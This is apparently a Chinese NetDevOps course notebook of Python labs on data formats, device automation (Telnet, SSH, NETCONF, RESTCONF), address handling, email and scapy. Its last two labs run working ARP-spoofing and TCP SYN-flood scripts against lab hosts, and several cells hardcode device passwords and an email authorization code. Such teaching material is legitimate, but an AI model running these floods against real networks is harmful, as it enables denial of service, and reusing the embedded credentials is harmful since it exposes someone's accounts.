# Yeslab NetDevOps 课程实验



## 1. JSON实验 🚝

In [ ]:
import json

data = {"routers" : [{"hostname":"R1", "IP":"192.168.1.1", "Interface":"Eth0"},
                     {"hostname":"R2", "IP":"192.168.1.100", "Interface":"Eth1"}]}
a = json.dumps(data ,indent=4)
#print(a)

routers = json.loads(a)
#print(routers)

class router_sign():
    def __init__(self, name, ip, interface):
        self.name = name
        self.ip = ip
        self.interface = interface
        self.say_hello()
        
    def say_hello(self):
        print("{}已经注册进来了！".format(self.name))
        
router_list = []

for msg in routers['routers']:
    router_list.append(router_sign(msg['hostname'], msg['IP'], msg['Interface']))
    

In [ ]:
def play_json(doc_path):
    with open(doc_path, encoding='utf-8') as f:
        ori_data = f.readlines()
        data = ''.join(ori_data)

    py_data = json.loads(data)
    py_data.pop('conformsTo')
    py_data.pop('describedBy')
    py_data.pop('@context')
    py_data.pop('@type')
    need_data = py_data['dataset']
    
    return need_data
    
    
data = play_json('data/jsondoc')

## 2. XML实验 🧔

### 2.1 DOM

In [ ]:
from xml.dom import minidom as DOM

DOM_Tree = DOM.parse("data/interfaces.xml")
DOM_Data = DOM_Tree.documentElement
if DOM_Data.hasAttribute("vendor"):
    print(DOM_Data.getAttribute("vendor"))

DOM_Interface = DOM_Data.getElementsByTagName("interface")
for interface in DOM_Interface:
    print(interface.getElementsByTagName("name")[0].firstChild.data)
    
print("*"*40)

DOM_Name = DOM_Data.getElementsByTagName("name")
for name in DOM_Name:
    print(name.firstChild.data)

### 2.2 ElementTree

In [ ]:
from xml.etree import ElementTree as ET

ET_Tree = ET.parse("data/interfaces.xml")
ET_Root = ET_Tree.getroot()
print(ET_Root.attrib)

ET_Interface = ET_Root.findall("./*/interface")
for interface in ET_Interface:
    print(interface.getchildren()[0].text)
    
print("*"*40)

ET_Name = ET_Root.findall("./*/*/name")
for name in ET_Name:
    print(name.text)

## 3. YAML 实验 👽

In [ ]:
import yaml

with open('data/amcl_params.yaml') as file:
    data_str = file.read()
    data_yaml = yaml.load(data_str, Loader=yaml.FullLoader)
    #for data in data_yaml.get("interfaces"):
        #print(data.values())

In [ ]:
data_yaml['global_frame_id']

In [ ]:
data_str

## 4. Telnetlib 实验 😱

In [ ]:
import telnetlib
import time

### 4.1 网络运维参数

In [ ]:
en_pass = b"en123"
telnet_pass = b"telnet123"
ip = "192.168.35.20"

commands = [b"show interface e0", b"show interface fa0"]

### 4.2 进行设备登录

In [ ]:
def dev_login(ip):
    host = telnetlib.Telnet(ip)
    host.read_until(b"Password:")
    host.write(telnet_pass + b"\n")
    host.write(b"enable" + b"\n")
    host.write(en_pass + b"\n")
    time.sleep(1)
    r1_name = host.read_very_eager().decode().split('\r\n')[-1][0:-1]
    return host

### 4.3 运维过程

In [ ]:
def dev_ops(host, commands):
    out_list = []
    for com in commands:
        host.write(b"\n" + com + b"\n")
        time.sleep(2)
        console_return = host.read_very_eager().decode()
        ## 处理分页内容
        while console_return.endswith("--More-- "):
            host.write(b' ')
            console_return += host.read_very_eager().decode()
        text = console_return.split("\r\n")
        text.pop(0)
        out_list.append(text)
    host.close()
    return out_list

### 4.4 数据处理

In [ ]:
def make_data(out_list):
    for one in out_list:
        for index in range(len(one)):
            if "\x08\x08\x08\x08\x08\x08\x08\x08\x08" in one[index]:
                one[index] = one[index].split("\x08\x08\x08\x08\x08\x08\x08\x08\x08")[2]
    return out_list

host = dev_login(ip)
data = dev_ops(host, commands)
result = make_data(data)

In [ ]:
result[1]

## 5. Paramiko 实验 🎭

In [ ]:
import paramiko
import time


class netRobot():
    def __init__(self,name):
        self.name = name
        self.dev1 = ["192.168.35.20", "22", "root", "ssh123", "en123"]
        self.commands = ["show run"]
            
    def ops_dev(self):
        
        try:
            server = paramiko.SSHClient()
            server.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            server.connect(self.dev1[0], self.dev1[1], self.dev1[2], self.dev1[3])
            shell = server.invoke_shell()
            info = shell.recv(65535).decode()
            
            if info.endswith(">"):
                shell.send("en\n")
                time.sleep(0.1)
                info = shell.recv(65535).decode()
                shell.send(self.dev1[-1] + "\n")
                info = shell.recv(65535).decode()
                
            if info.endswith("#"):
                shell.send("terminal length 0\n")
                time.sleep(0.1)
                info = shell.recv(65535).decode()
                shell.send(self.commands[0] + "\n")
                time.sleep(2)
                info = shell.recv(65535).decode()
                server.close()
            return info
                
        except Exception as e:
            print("设备{}出现了故障：{}".format(self.dev1[0], e))
            server.close()
            
    def create_data(self, info):
        text = info.split("\r\n")
        text.pop(0)
        text.pop(-1)
        data = [i for i in text if '!' not in i and i != '']       
        return data
    
    def OP(self):
        info = self.ops_dev()
        data = self.create_data(info)
        print("运维结束，一切OK！")
        return data      

In [ ]:
robotA = netRobot("showrun_robot")
data = robotA.OP()

In [ ]:
data

## 6. Netmiko 实验 🍿

In [ ]:
from netmiko import ConnectHandler
import time

In [ ]:
device_info = {
    "device_type": "cisco_ios",
    "ip" : "192.168.35.20", 
    "port" : "22", 
    "username" : "root",
    "password" : "ssh123",
    "secret" : "en123",
    "verbose" : True
}

commands = ["show ip route", "show running-config"]

In [ ]:
server = ConnectHandler(**device_info)
server.enable()
server.send_command("terminal length 0")


def OP(commands):
    results = []
    datas = []
    
    for cmd in commands:
        info = server.send_command(cmd)
        results.append(info)
    server.disconnect()
    
    for result in results:
        text = result.split('\n')
        data = [i for i in text if '!' not in i and i != '']
        datas.append(data)
        
    return datas

In [ ]:
datas = OP(commands)

In [ ]:
datas[0]

## 7. Pexpect 实验（代码在Linux机器上运行）🕵️‍♂️

In [ ]:
import pexpect

ip = "192.168.35.20"
password = "telnet123"
telnet_cmd = "telnet {}"

OPS = ["en", "conf t", "int fa0", "ip add 1.1.1.1 255.255.255.0", "no shut", "exit", "exit"]
OPS2= "ping 1.1.1.2"


def login(ip, password):
    proc = pexpect.spawn(telnet_cmd.format(ip))
    out = proc.expect([pexpect.TIMEOUT, "Password:"])
    if out == 1:
        proc.sendline(password)
        print(proc.before)
        print("*"*40)
        print(proc.after)
        print("登录成功")
        
    for cmd in OPS:
        proc.sendline(cmd)
        print("CMD Success!")
  
        
        
if __name__ == "__main__":
    login(ip, password)

## 8. Ncclient 实验🎉

Cicso IOS XR 的 [XML说明文档](https://www.cisco.com/c/en/us/td/docs/ios_xr_sw/iosxr_r4-1/xml/programming/guide/xl41apidoc/xl41netconf.html?bookSearch=true)

### 8.1 获取用户注册配置

In [ ]:
from ncclient import manager

info = {"host":"192.168.50.180",
        "port":"830",
        "username":"net",
        "password":"net",
        "device_params":{"name":"iosxr"}}

info_filter = '''
<filter xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
    <aaa xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-aaa-lib-cfg">
        <usernames xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-aaa-locald-cfg">
            <username>
            </username>
        </usernames>
    </aaa>
</filter>
'''

with manager.connect(**info) as device:
    print("连接成功!")
    conf = device.get_config(source="running", filter=info_filter)
    print(conf)

### 8.2 修改用户注册配置

In [ ]:
config_file = '''
<nc:config xmlns:nc="urn:ietf:params:xml:ns:netconf:base:1.0">
    <aaa xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-aaa-lib-cfg">
        <usernames xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-aaa-locald-cfg">
            <username nc:operation="delete">
                <name>tea</name>
            </username>
        </usernames>
    </aaa>
</nc:config>
'''

with manager.connect(**info) as device:
    print("连接成功!")
    result = device.edit_config(target="candidate", config=config_file)
    print(result)
    device.commit()
    
    new_conf = device.get_config(source="running", filter=info_filter)
    print(new_conf)

## 9. Yang-explore 🚲

In [ ]:
from ncclient import manager
from ncclient.operations import RPCError

In [ ]:
payload = """
<config xmlns:xc="urn:ietf:params:xml:ns:netconf:base:1.0" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
  <interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg" xmlns:ipv4-io-cfg="http://cisco.com/ns/yang/Cisco-IOS-XR-ipv4-io-cfg">
    <interface-configuration>
      <shutdown xc:operation="remove"/>
      <active>act</active>
      <interface-name>GigabitEthernet0/0/0/1</interface-name>
      <ipv4-io-cfg:ipv4-network>
        <ipv4-io-cfg:addresses>
          <ipv4-io-cfg:primary>
            <ipv4-io-cfg:address>10.10.10.11</ipv4-io-cfg:address>
            <ipv4-io-cfg:netmask>255.255.255.0</ipv4-io-cfg:netmask>
          </ipv4-io-cfg:primary>
        </ipv4-io-cfg:addresses>
      </ipv4-io-cfg:ipv4-network>
    </interface-configuration>
  </interface-configurations>
</config>
"""
# connect to netconf agent
with manager.connect(host='192.168.50.181',
                     port=830,
                     username='admin',
                     password='admin',
                     device_params={'name': 'iosxr'}) as m:

    # execute netconf operation
    try:
        data = m.edit_config(target='candidate', config=payload).xml
        m.commit()
    except RPCError as e:
        data = e._raw

    # beautify output
    print(data)


## 10. Restconf 🏄‍♂️

In [ ]:
import requests

In [ ]:
Host = "ios-xe-mgmt.cisco.com"
Port = "9443"
Username = "developer"
Password = "C1sco12345"

API = "/restconf/data/Cisco-IOS-XE-native:native/ip/domain"
URL = "https://" + Host + ":" + Port + API
PAYLOAD = "{\"name\": \"cisco.com\"}"

#headers = {'Content-Type': 'application/yang-data+json','Accept': 'application/yang-data+json'}

### 10.1 查询信息

In [ ]:
res = requests.request("GET", url=URL, auth=(Username,Password), verify=False)
print(res.text)
res

### 10.2 删除信息

In [ ]:
res2 = requests.request("DELETE", url=URL,auth=(Username,Password), verify=False, data=PAYLOAD)
print(res2.text)
res2

### 10.3 提交信息

In [ ]:
res3 = requests.request("POST", url=URL, auth=(Username,Password), verify=False)
print(res3.text)
res3

## 11. 正则表达式 🍜

In [ ]:
import re

data = "http://cisco1.com/ns/yang/Cisco-NX-OS-aaa-LIB-cfg"
pattern = "^http://cisco1.com/ns/yang/Cisco-(IOS-XR|IOS-XE|NX-OS)-aaa-(lib|LIB)-cfg$"
result = re.match(pattern, data)

result.groups()

## 12. Textfsm 🛸

In [ ]:
import textfsm

with open("textFSM/info") as file:
    data = file.read()
    
with open("textFSM/temp") as temp:
    fsm = textfsm.TextFSM(temp)
    
result = fsm.ParseText(data)
for row in result:
    print(row)
    
fsm.header

## 13. Ciscoconfparse 🚁

In [ ]:
from ciscoconfparse import CiscoConfParse

In [ ]:
CONFIG = """!
interface Serial 1/0
 encapsulation ppp
 ip address 1.1.1.1 255.255.255.252
!
interface GigabitEthernet4/1
 switchport
 switchport access vlan 100
 switchport voice vlan 150
 power inline static max 7000
!
interface GigabitEthernet4/2
 switchport
 switchport access vlan 100
 switchport voice vlan 150
 power inline static max 7000
!
interface GigabitEthernet4/3
 switchport
 switchport access vlan 100
 switchport voice vlan 150
 shutdown
!"""
parse = CiscoConfParse(CONFIG.splitlines())

In [ ]:
# Return a list of all interfaces
intfs = parse.find_objects("^interface")

# Return a list of all interfaces with ppp encap
ppp_intfs = parse.find_objects_w_child( "^interf", "encapsulation ppp")

# Return a list of all active interfaces (i.e. not shutdown)
active_intfs = parse.find_objects_wo_child( "^interface", "shutdown" )

# For each interface above, print out relevant information...
for obj in active_intfs:
    print("-----")

    # Find the interface mode
    intf_mode = obj.re_match_iter_typed('^\s*(switchport)$', default='routed')

    # Find the IP address by iterating over all children of this parent...
    ip_addr = obj.re_match_iter_typed('ip\saddress\s(\S+)', default='N/A')

    # Print out what we found...
    print("Object: {0}".format(obj))
    print("  Interface config line: {0}".format(obj.text))
    print("  Interface mode: {0}".format(intf_mode))
    print("  IP address: {0}".format(ip_addr))

## 14. Netaddr 🏀

In [ ]:
from netaddr import IPNetwork, IPAddress, IPRange

In [ ]:
# 信息查询
ip = IPNetwork("192.168.1.100/27")
ip_mask = ip.netmask
ip_bro = ip.broadcast
ip_net = ip.network
ip_hmask = ip.hostmask
ip_size = ip.size

# 掩码长度修改
ip.prefixlen = 30
ip

### 14. IP地址处理

In [ ]:
# 子网划分
ip = IPNetwork("192.168.1.32/24")
subnets = [net for net in ip.subnet(26)]
subnets

## 某个子网内部的IP
sub_ip = [ip.format() for ip in IPNetwork('192.168.1.0/26').iter_hosts()]
sub_ip

# 网络地址范围聚合
range_ip = IPRange("192.168.0.100","192.168.0.200")
range_ip.cidrs()

# 单个IP地址进行加减法
ip = IPAddress("172.20.1.1")
ip + 256

### 14.2 处理Mac

In [ ]:
from netaddr import EUI

one_mac = EUI("48-45-20-BA-15-12")
one_mac.info

## 15. Ipaddress ⚽

In [ ]:
import ipaddress

In [ ]:
net = ipaddress.IPv4Network("192.168.1.0/24")
ip = ipaddress.IPv4Address("192.168.1.1")

In [ ]:
subnets = [subnet for subnet in net.subnets(2)]
sub_net = subnets[0]
sub_ip = [ip.compressed for ip in sub_net.hosts()]
sub_ip
ip - 1

## 16. Networkx 🚀

In [ ]:
import networkx as nx

In [ ]:
G = nx.DiGraph()

edges_list = [("INTERNET","FIREWALL",0),
              ("FIREWALL","IPS",0),
              ("IPS","SWITCH_1",1),
              ("SWITCH_1","SWITCH_2",2),
              ("SWITCH_2","APP_CENTER",1),
              ("APP_CENTER","DB",1)]

POS = { 'INTERNET':(50,10),
        'FIREWALL':(50,20),
        'IPS':(50,30),
        'SWITCH_1':(50,40),
        'SWITCH_2':(45,50),
        'APP_CENTER':(60,60),
        'DB':(70,70),
        'OFFICE':(40,60),
        'DMZ':(30,40)}

G.add_weighted_edges_from(edges_list)
G.add_edge("SWITCH_2","OFFICE")
G.add_edge("SWITCH_1","DMZ")
G.add_edge("SWITCH_1","DB", weight=4)
G.add_edge("IPS","APP_CENTER",weight=10)
nx.draw(G,with_labels=True, pos=POS)

In [ ]:
nx.shortest_path(G,"INTERNET","DB",weight="weight")

In [ ]:
calc_short = list(nx.all_shortest_paths(G,"INTERNET","DB",weight="none"))

In [ ]:
calc_short

## 17. Python 发送邮件📧

In [ ]:
import smtplib
from email.header import Header
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

In [ ]:
class MAIL_SENDER():
    def __init__(self, usermail, password, obj_address, smtpserver, smtpport=25):
        self.usermail = usermail
        self.password = password
        self.obj_address = obj_address
        self.smtpserver = smtpserver
        self.smtpport = smtpport
        
    def create_mail(self, subject, text):
        msg = MIMEMultipart('mixed')
        msg['From'] = self.usermail
        msg['To'] = self.obj_address
        msg['Subject'] = Header(subject, 'utf-8')
        text_sub = MIMEText(text, 'plain', 'utf-8')
        msg.attach(text_sub)
        
        return msg.as_string()
        
    def send(self, msg):
        try:
            sender = smtplib.SMTP(self.smtpserver, self.smtpport)
            sender.login(self.usermail, self.password)
            sender.sendmail(self.usermail, self.obj_address, msg)
            print("发送成功")
            sender.quit()
            
        except Exception as e:
            print("发送失败，错误如下：")
            print(e)

In [ ]:
reporter = MAIL_SENDER("154354595@qq.com", "eqyrwmkawwhibjde", "ccxxll23@tom.com", "smtp.qq.com")

In [ ]:
msg = reporter.create_mail("有故障！","坦克发生接口故障，请维修3号口！")

In [ ]:
reporter.send(msg)

## 18. Scapy 基础实验 🚗

In [ ]:
import scapy.all as sp

### 18.1 空IP报文

In [ ]:
PKG1 = sp.IP(dst='192.168.50.186')
sp.ls(PKG1)
sp.send(PKG1)

### 18.2 PING

In [ ]:
res, unans = sp.sr(PKG1 / sp.ICMP(), timeout=1)
res.show()

### 18.3 TCP

In [ ]:
tcp_res, tcp_unans = sp.sr(PKG1 / sp.TCP(sport=sp.RandShort(), dport=80))

In [ ]:
tcp_res[0]

## 19. 数据包伪造 🔥

In [3]:
import scapy.all as sp

ATT_PKG = sp.ARP(psrc=sp.RandIP("192.168.50.1/24"), pdst="192.168.50.186", hwsrc=sp.RandMAC(), hwdst="c2:01:7d:5c:00:00")
ATT_PKG.show()

###[ ARP ]### 
  hwtype    = 0x1
  ptype     = IPv4
  hwlen     = None
  plen      = None
  op        = who-has
  hwsrc     = 94:56:99:6b:c9:e2
  psrc      = <RandIP>
  hwdst     = c2:01:7d:5c:00:00
  pdst      = 192.168.50.186



In [5]:
sp.send(ATT_PKG, loop=1)


Sent 18342 packets.


## 20. 高层攻击 🍄

In [2]:
from scapy.all import *
import random

In [ ]:
sip = '192.168.50.226'
dip = '192.168.50.97'
sport = random.randint(4096, 65535)
dport = 80

def attack(sip, dip, sport, dport):
    osi_3 = IP(src=sip, dst=dip)
    osi_4 = TCP(sport=sport, dport=dport, flags='S')
    pkg = osi_3 / osi_4
    send(pkg)
    
while True:
    attack(sip, dip, sport, dport)


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet

...


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.